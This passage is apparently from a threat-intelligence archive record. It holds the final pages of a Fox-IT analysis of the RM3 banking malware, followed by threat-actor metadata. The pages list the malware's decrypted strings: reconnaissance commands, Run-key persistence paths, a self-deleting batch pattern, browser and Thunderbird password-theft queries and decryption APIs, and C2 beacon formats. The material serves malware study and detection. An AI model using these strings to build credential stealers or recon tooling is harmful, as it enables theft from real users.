52\n\n{%08X-%04X-%04X-%04X-%08X%04X}\r\nSetThreadInformation\r\nGetWindowThreadProcessId\r\n%08X-%04X-%04X-%04X-%08X%04X\r\nRtlExitUserThread\r\nS-%u-%u\r\n-%u\r\nLocal\\\r\n\\\\.\\pipe\\\r\n%05u\r\nLdrRegisterDllNotification\r\nNtClose\r\nZwProtectVirtualMemory\r\nLdrGetProcedureAddress\r\nWaitNamedPipeW\r\nCallNamedPipeW\r\nLdrLoadDll\r\nNtCreateUserProcess\r\n.dll\r\n%08x\r\nGetShellWindow\r\n\\KnownDlls\\ntdll.dll\r\n%systemroot%\\system32\\c_1252.NLS\r\n\\??\\\r\n\\\\?\\\r\nexplorer.dll – bss decrypted\r\nindows Security\r\n.jpeg\r\nMain\r\n.gif\r\n.bmp\r\n%APPDATA%\\Microsoft\\\r\ntasklist.exe /SVC\r\n\\Microsoft\\Windows\\\r\ncmd /C \"%s\" \u003e\u003e %S0\r\nsysteminfo.exe\r\ndriverquery.exe\r\nnet view\r\nnslookup 127.0.0.1\r\nwhoami /all\r\nnet localgroup administrators\r\nnet group \"domain computers\" /domain\r\nreg.exe query \"HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\" /s\r\ncmd /U /C \"type %S0 \u003e %S \u0026 del %S0\"\r\nhttps://blog.fox-it.com/2021/05/04/rm3-curiosities-of-the-wildest-banking-malware/\r\nPage 45 of 52\n\necho -------- %u\r\nKERNELBASE\r\n.exe\r\nRegGetValueW\r\n0x%S\r\n.DLL\r\nDllRegisterServer\r\nSOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Serialize\r\n0x%X,%c%c\r\nStartupdelayinmsec\r\nICGetInfo\r\nSOFTWARE\\Classes\\Chrome\r\nDelegateExecute\r\n\\\\?\\\r\n%userprofile%\\appdata\\local\\google\\chrome\\user data\\default\\cache\r\n\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\r\nhttp\\shell\\open\\command\r\nICSendMessage\r\n%08x\r\n | \"%s\" | %u\r\nmsvfw32\r\nICOpen\r\nICClose\r\nICInfo\r\nmain\r\n%userprofile%\\AppData\\Local\\Mozilla\\Firefox\\Profiles\r\n.avi\r\nhttps://\r\nVideo: sec=%u, fps=%u, q=%u\r\nLocal\\\r\n%userprofile%\\appdata\\local\\microsoft\\edge\\user data\\default\\cache\r\nMiniDumpWriteDump\r\ncache2\\entries\\*.*\r\n%PROGRAMFILES%\\Mozilla Firefox\r\n%USERPROFILE%\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\*.default*\r\nSoftware\\Classes\\CLSID\\%s\\InProcServer32\r\nopen\r\nhttp://\r\nfile://\r\nDBGHELP.DLL\r\n%temp%\\rm3.dmp\r\n%u, 0x%x, \"%S\"\r\n\"%S\", 0x%p, 0x%x\r\n%APPDATA%\r\nSOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\r\nInstallDate\r\nhttps://blog.fox-it.com/2021/05/04/rm3-curiosities-of-the-wildest-banking-malware/\r\nPage 46 of 52\n\nrt.dll – bss decrypted\r\nWindows Security\r\n%s%02u:%02u:%02u\r\n:%u\r\nattrib -h -r -s %%1\r\ndel %%1\r\nif exist %%1 goto %u\r\ndel %%0\r\nLow\\\r\nABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/\r\n|$$$}rstuvwxyz{$$$$$$$\u003e?@ABCDEFGHIJKLMNOPQRSTUVW$$$$$$XYZ[\\]^_`abcdefghijklmnopq\r\n*.*\r\n.bin\r\nopen\r\n%02u-%02u-%02u %02u:%02u:%02u\r\n*.dll\r\n%systemroot%\\system32\\c_1252.NLS\r\nrundll32 \"%s\",%S %s\r\n\"%s\"\r\ncmd /C regsvr32 \"%s\"\r\nMb=Lk\r\nAuthor\r\nn;\r\nQkkXa\r\nM\u003cq\r\nnetwrk.dll – bss decrypted\r\n\u0026WP\r\nPOST\r\nHost\r\n%04x%04x\r\nGET\r\nWindows Security\r\nContent-Type: multipart/form-data; boundary=%s\r\nContent-Type: application/octet-stream\r\n--%s\r\n--%s--\r\n%c%02X\r\nhttps://\r\nhttp://\r\n%08x%08x%08x%08x\r\nform\r\n%s=%s\u0026\r\nhttps://blog.fox-it.com/2021/05/04/rm3-curiosities-of-the-wildest-banking-malware/\r\nPage 47 of 52\n\n/images/\r\n.bmp\r\nfile://\r\ntype=%u\u0026soft=%u\u0026version=%u\u0026user=%08x%08x%08x%08x\u0026group=%u\u0026id=%08x\u0026arc=%u\u0026crc=%08x\u0026size=%u\u0026uptime=%u\r\nindex.html\r\nContent-Disposition: form-data; name=\"%s\"\r\n; filename=\"%s\"\r\n\u0026os=%u.%u_%u_%u_x%u\r\n\u0026ip=%s\r\nMozilla/5.0 (Windows NT %u.%u%s; Trident/7.0; rv:11.0) like Gecko\r\n; Win64; x64\r\nABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/\r\n%08x\r\n|$$$}rstuvwxyz{$$$$$$$\u003e?@ABCDEFGHIJKLMNOPQRSTUVW$$$$$$XYZ[\\]^_`abcdefghijklmnopq\r\nF%D,3\r\noverridelink\r\ninvalidcert\r\n9*.onion\r\n\u0026sysid=%08x%08x%08x%08x\r\nbrowser.dll – bss decrypted\r\n%c%02X\r\n.php\r\nWindows Security\r\n1.3.6.1.5.5.7.3.2\r\n1.3.6.1.5.5.7.3.1\r\n2.5.29.15\r\n2.5.29.37\r\n2.5.29.1\r\n2.5.29.35\r\n2.5.29.14\r\n2.5.29.10\r\n2.5.29.19\r\n1.3.6.1.5.5.7.1.1\r\n2.5.29.32\r\n1.3.6.1.5.5.7.1.11\r\n1.3.6.1.5.5.7\r\n1.3.6.1.5.5.7.1\r\n2.5.29.31\r\n1.2.840.113549.1.1.11\r\n1.2.840.113549.1.1.5\r\nWS2_32.dll\r\niexplore.hlp\r\nConnectEx\r\nLocal\\\r\nhttps://blog.fox-it.com/2021/05/04/rm3-curiosities-of-the-wildest-banking-malware/\r\nPage 48 of 52\n\nWSOCK32.DLL\r\nWININET.DLL\r\nCRYPT32.DLL\r\nsocket\r\nconnect\r\nclosesocket\r\ngetpeername\r\nWSAStartup\r\nWSACleanup\r\nWSAIoctl\r\nUser-Agent\r\nContent-Type\r\nContent-Length\r\nConnection\r\nContent-Security-Policy\r\nContent-Security-Policy-Report-Only\r\nX-Frame-Options\r\nAccess-Control-Allow-Origin\r\nchunked\r\nWebSocket\r\nTransfer-Encoding\r\nContent-Encoding\r\nAccept-Encoding\r\nAccept-Language\r\nCookie\r\nidentity\r\ngzip, deflate\r\ngzip\r\nHost\r\n://\r\nHTTP/1.1 404 Not Found\r\nContent-Length: 0\r\n://\r\nHTTP/1.1 503 Service Unavailable\r\nContent-Length: 0\r\nhttp://\r\nhttps://\r\nReferer\r\nUpgrade\r\nCache-Control\r\nLast-Modified\r\nEtag\r\nno-cache, no-store, must-revalidate\r\nocsp\r\nTEXT HTML JSON JAVASCRIPT\r\nSECUR32.DLL\r\nSECURITY.DLL\r\nhttps://blog.fox-it.com/2021/05/04/rm3-curiosities-of-the-wildest-banking-malware/\r\nPage 49 of 52\n\nInitSecurityInterfaceW\r\nBUNNY\r\nSYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\SCHANNEL\r\nSendTrustedIssuerList\r\n@ID@\r\nURL=\r\nMain\r\n@RANDSTR@\r\nBlocked\r\n@GROUP@\r\nBLOCKCFG=\r\nLOADCFG=\r\nDELCFG=\r\nVIDEO=\r\nVNC=\r\nSOCKS=\r\nCFGON=\r\nCFGOFF=\r\nENCRYPT=\r\nhttp\r\n@%s@\r\nhttp\r\ngrabs=\r\nPOST\r\nPUT\r\nGET\r\nHEAD\r\nOPTIONS\r\nURL: %s\r\nREF: %s\r\nLANG: %s\r\nAGENT: %s\r\nCOOKIE: %s\r\nPOST:\r\nUSER: %s\r\nUSERID: %s\r\n@*@\r\n***\r\nIE:\r\n:Microsoft Unified Security Protocol Provider\r\nFF:\r\nCR:\r\nED:\r\niexplore\r\nfirefox\r\nchrome\r\nedge\r\nhttps://blog.fox-it.com/2021/05/04/rm3-curiosities-of-the-wildest-banking-malware/\r\nPage 50 of 52\n\nInitRecv %u, %s%s\r\nCompleteRecv %u, %s%s\r\nLoadUrl %u, %s\r\nNEWGRAB\r\nCertGetCertificateChain\r\nCertVerifyCertificateChainPolicy\r\nNSS_Init\r\nNSS_Shutdown\r\nnss3.dll\r\nPK11_GetInternalKeySlot\r\nPK11_FreeSlot\r\nPK11_Authenticate\r\nPK11SDR_Decrypt\r\nhostname\r\nvaultcli\r\n%PROGRAMFILES%\\Mozilla Thunderbird\r\nencryptedUsername\r\n%USERPROFILE%\\AppData\\Roaming\\Thunderbird\\Profiles\\*.default\r\nencryptedPassword\r\nlogins.json\r\n%systemroot%\\syswow64\\svchost.exe\r\nSoftware\\Microsoft\\Internet Explorer\\IntelliForms\\Storage2\r\nFindCloseUrlCache\r\nVaultEnumerateItems\r\ntype=%s, name=%s, address=%s, server=%s, port=%u, ssl=%s, user=%s, password=%s\r\nFindNextUrlCacheEntryW\r\nFindFirstUrlCacheEntryW\r\nDeleteUrlCacheEntryW\r\nVaultEnumerateVaults\r\nVaultOpenVault\r\nVaultCloseVault\r\nVaultFree\r\nVaultGetItem\r\nc:\\test\\sqlite3.dll\r\nSELECT origin_url, username_value, password_value FROM logins\r\nencrypted_key\":\"\r\ndefault\\login data\r\nBCryptSetProperty\r\n%userprofile%\\appdata\\local\\google\\chrome\\user data\r\nlocal state\r\nDPAPI\r\nv10\r\nBCryptDecrypt\r\nAES\r\nMicrosoft Primitive Provider\r\nBCryptDestroyKey\r\nBCryptCloseAlgorithmProvider\r\nhttps://blog.fox-it.com/2021/05/04/rm3-curiosities-of-the-wildest-banking-malware/\r\nPage 51 of 52\n\nChainingModeGCM\r\nBCryptOpenAlgorithmProvider\r\nBCryptGenerateSymmetricKey\r\nBCRYPT\r\n%userprofile%\\appData\\local\\microsoft\\edge\\user data\r\nSource: https://blog.fox-it.com/2021/05/04/rm3-curiosities-of-the-wildest-banking-malware/\r\nhttps://blog.fox-it.com/2021/05/04/rm3-curiosities-of-the-wildest-banking-malware/\r\nPage 52 of 52", "extraction_quality": 1, "language": "EN", "sources": [ "Malpedia" ], "references": [ "https://blog.fox-it.com/2021/05/04/rm3-curiosities-of-the-wildest-banking-malware/" ], "report_names": [ "rm3-curiosities-of-the-wildest-banking-malware" ], "threat_actors": [ { "id": "1998ad13-b343-4409-9a37-b1930d156a28", "created_at": "2023-09-17T02:00:09.948891Z", "updated_at": "2026-04-10T02:00:03.372224Z", "deleted_at": null, "main_name": "Storm-0324", "aliases": [ "DEV-0324", "Sagrid", "TA543" ], "source_name": "MISPGALAXY:Storm-0324", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "9f101d9c-05ea-48b9-b6f1-168cd6d06d12", "created_at": "2023-01-06T13:46:39.396409Z", "updated_at": "2026-04-10T02:00:03.312816Z", "deleted_at": null, "main_name": "Earth Lusca", "aliases": [ "CHROMIUM", "ControlX", "TAG-22", "BRONZE UNIVERSITY", "AQUATIC PANDA", "RedHotel", "Charcoal Typhoon", "Red Scylla", "Red Dev 10", "BountyGlad" ], "source_name": "MISPGALAXY:Earth Lusca", "tools": [ "RouterGod", "SprySOCKS", "ShadowPad", "POISONPLUG", "Barlaiy", "Spyder", "FunnySwitch" ], "source_id": "MISPGALAXY", "reports": null }, { "id": "18a7b52d-a1cd-43a3-8982-7324e3e676b7", "created_at": "2025-08-07T02:03:24.688416Z", "updated_at": "2026-04-10T02:00:03.734754Z", "deleted_at": null, "main_name": "BRONZE UNIVERSITY", "aliases": [ "Aquatic Panda", "Aquatic Panda ", "CHROMIUM", "CHROMIUM ", "Charcoal Typhoon", "Charcoal Typhoon ", "Earth Lusca", "Earth Lusca ", "FISHMONGER ", "Red Dev 10", "Red Dev 10 ", "Red Scylla", "Red Scylla ", "RedHotel", "RedHotel ", "Tag-22", "Tag-22 " ], "source_name": "Secureworks:BRONZE UNIVERSITY", "tools": [ "Cobalt Strike", "Fishmaster", "FunnySwitch", "Spyder", "njRAT" ], "source_id": "Secureworks", "reports": null }, { "id": "6abcc917-035c-4e9b-a53f-eaee636749c3", "created_at": "2022-10-25T16:07:23.565337Z", "updated_at": "2026-04-10T02:00:04.668393Z", "deleted_at": null, "main_name": "Earth Lusca", "aliases": [ "Bronze University", "Charcoal Typhoon", "Chromium", "G1006", "Red Dev 10", "Red Scylla" ], "source_name": "ETDA:Earth Lusca", "tools": [ "Agentemis", "AntSword", "BIOPASS", "BIOPASS RAT", "BadPotato", "Behinder", "BleDoor", "Cobalt Strike", "CobaltStrike", "Doraemon", "FRP", "Fast Reverse Proxy", "FunnySwitch", "HUC Port Banner Scanner", "KTLVdoor", "Mimikatz", "NBTscan", "POISONPLUG.SHADOW", "PipeMon", "RbDoor", "RibDoor", "RouterGod", "SAMRID", "ShadowPad Winnti", "SprySOCKS", "WinRAR", "Winnti", "XShellGhost", "cobeacon", "fscan", "lcx", "nbtscan" ], "source_id": "ETDA", "reports": null }, { "id": "d53593c3-2819-4af3-bf16-0c39edc64920", "created_at": "2022-10-27T08:27:13.212301Z", "updated_at": "2026-04-10T02:00:05.272802Z", "deleted_at": null, "main_name": "Earth Lusca", "aliases": [ "Earth Lusca", "TAG-22", "Charcoal Typhoon", "CHROMIUM", "ControlX" ], "source_name": "MITRE:Earth Lusca", "tools": [ "Mimikatz", "PowerSploit", "Tasklist", "certutil", "Cobalt Strike", "Winnti for Linux", "Nltest", "NBTscan", "ShadowPad" ], "source_id": "MITRE", "reports": null } ], "ts_created_at": 1775438994, "ts_updated_at": 1775792208, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/2a6ddec1042a190564dae5c5d5fcbd5f120564c0.pdf", "text": "https://archive.orkl.eu/2a6ddec1042a190564dae5c5d5fcbd5f120564c0.txt", "img": "https://archive.orkl.eu/2a6ddec1042a190564dae5c5d5fcbd5f120564c0.jpg" } }